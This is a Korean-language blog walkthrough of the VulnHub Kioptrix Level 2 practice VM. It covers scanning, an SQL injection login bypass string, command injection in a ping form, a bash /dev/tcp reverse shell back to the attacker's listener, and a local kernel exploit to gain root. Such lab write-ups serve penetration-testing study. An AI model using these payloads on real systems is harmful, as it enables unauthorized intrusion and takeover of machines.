[vulnhub] kioptrix level 2 - walkthrough

[분석환경]
VMware 2010 Pro
Kali Linux 2021.01

[분석도구]
1. netdiscover
2. nmap
3. netcat
4. msf(metasploit)
5. python2

[문제 경로]
https://isroot.nl/2018/09/09/vulnhub-write-up-kioptrix-level-2/

1. netdiscover

칼리에서 netdiscover 명령으로 동일 NAT상에 있는 타겟을 탐색한다.

192.168.159.130 에서 동작 중인 타겟 확인

2. nmap

포트스캔 명령을 통해 열린 포트를 확인한다. 80포트가 열려 있음을 확인하였고 브라우저에서 http://192.168.159.130로 접속하여 페이지를 확인한다.

> nmap -sC -sV 192.168.159.130

접속하면 로그인 페이지가 나온다.

SQL Injection 시도하여 인증과정을 우회할 수 있다.

입력한 ID > root' OR 1=1 --

입력한 PW > 1

로그인 이후에는 입력한 IP 주소로 pingtest를 수행하는 페이지가 나온다.

3. Command Injection

세미콜론(;)을 사용하여 명령을 구분하고 사용할 명령어를 입력하여 명령어가 실행되는지 확인한다.

ls 명령 실행 확인

php에서 명령어 인젝션이 가능함을 확인하였으므로 리버스쉘을 구성한다.

4. Reverse Shell

kali에서 nc -nvlp 443 —allow 192.168.159.131 명령을 사용하여 리버스쉘 연결을 대기한다.

타겟에서 127.0.0.1;bash -i >& /dev/tcp/192.168.159.129/443 0>&1 를 실행하여 리버스 쉘 연결을 시도한다.

리버스 쉘 연결 및 리눅스 버전 확인

구버전의 리눅스(Linux version 2.6.9)를 사용하고 있는 것을 확인할 수 있다.

5. exploit

searchsploit Linux Kernel 2.6 CentOS | grep CentOS 명령을 통해 버전에 맞는 익스플로잇을 검색한다.

searchsploit -m 9542.c 을 통해 다운받는다.

다운받은 파일을 연결된 쉘을 통해 타겟에서 다운받고 실행시키면 root 권한을 획득할 수 있다.

6. GET ROOT

ROOT 권한 획득

+. Review

모의침투 테스트 환경이 많지 않은데 VM을 기반으로 한 좋은 문제중 하나였다. 다음 단계도 풀어보자!

반응형

'Wargame & CTF > Pentest' 카테고리의 다른 글

[vulnhub] Tr0ll: 1 - writeup  (0) 2021.03.19
[vulnhub] PwnLab - Writeup  (0) 2021.03.16